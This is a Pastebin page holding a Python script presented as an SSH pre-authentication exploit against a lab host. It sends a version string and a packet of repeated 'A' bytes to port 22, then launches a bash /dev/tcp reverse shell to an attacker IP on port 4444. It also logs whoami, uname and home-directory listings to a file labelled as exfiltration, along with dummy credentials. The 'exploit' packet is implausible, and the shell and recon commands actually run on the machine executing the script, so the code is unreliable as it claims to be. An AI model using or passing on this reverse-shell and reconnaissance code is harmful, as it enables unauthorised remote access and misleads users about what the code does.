Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import time
- import os
- # Lab IPs
- target_ip = "192.168.1.100"
- attacker_ip = "192.168.1.1"
- attacker_port = 4444
- def build_ssh_version():
- return b'SSH-2.0-ErlangTest_0.1\r\n'
- def build_crafted_packet():
- return b"\x00\x00\x00\x10" + b"\x41" * 16
- def trigger_reverse_shell():
- print(f"[+] Triggering reverse shell to {attacker_ip}:{attacker_port}")
- os.system(f"/bin/bash -c 'bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1'")
- def simulate_post_exploitation():
- print("[+] Simulating post-exploitation behavior...")
- # Command 1: whoami
- os.system("whoami >> /tmp/exfil.log")
- # Command 2: system info
- os.system("uname -a >> /tmp/exfil.log")
- # Command 3: show directory structure
- os.system("ls -alh /home/ >> /tmp/exfil.log")
- # Command 4: dummy file access
- with open("/tmp/exfil.log", "a") as f:
- f.write("\n[+] Simulated exfil of dummy credentials...\n")
- f.write("username: admin\npassword: hunter2\n")
- print("[+] Post-exploitation simulation written to /tmp/exfil.log")
- def send_exploit():
- print(f"[+] Connecting to target {target_ip}:22...")
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect((target_ip, 22))
- sock.sendall(build_ssh_version())
- print(f"[+] Sent SSH version string")
- time.sleep(0.5)
- sock.sendall(build_crafted_packet())
- print(f"[+] Sent crafted SSH pre-auth packet")
- time.sleep(0.5)
- sock.close()
- # Simulate reverse shell and post-exploit activity
- trigger_reverse_shell()
- time.sleep(1)
- simulate_post_exploitation()
- if __name__ == "__main__":
- send_exploit()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
